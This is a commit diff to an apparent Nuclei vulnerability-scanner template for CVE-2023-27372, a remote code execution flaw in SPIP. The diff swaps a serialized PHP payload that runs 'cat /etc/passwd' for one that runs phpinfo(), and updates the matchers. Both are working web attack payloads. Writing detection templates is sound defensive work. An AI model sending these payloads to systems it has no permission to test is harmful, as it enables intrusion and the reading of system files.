payload updation to detect both windows and linux

http/cves/2023/CVE-2023-27372.yaml

@@ -2,7 +2,7 @@ id: CVE-2023-27372
 
 info:
   name: SPIP - Remote Command Execution
-  author: DhiyaneshDK
+  author: DhiyaneshDK,nuts7
   severity: critical
   description: |
     SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
@@ -31,19 +31,21 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s%3A35%3A%22%3C%3Fphp+system%28%27cat+%2Fetc%2Fpasswd%27%29%3B+%3F%3E%22%3B
+        page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:"<?php phpinfo(); ?>";
 
     matchers-condition: and
     matchers:
-      - type: regex
-        part: body_2
-        regex:
-          - "root:.*:0:0:"
-
       - type: word
-        part: header_2
+        part: body_2
         words:
-          - text/html
+          - "PHP Extension"
+          - "PHP Version"
+          - "<!DOCTYPE html"
+        condition: and
+
+      - type: status
+        status:
+          - 200
 
     extractors:
       - type: regex
@@ -53,3 +55,9 @@ http:
         part: body_1
         regex:
           - "name='formulaire_action_args'[^>]*value='([^']*)'"
+
+      - type: regex
+        part: body_2
+        group: 1
+        regex:
+          - '>PHP Version <\/td><td class="v">([0-9.]+)'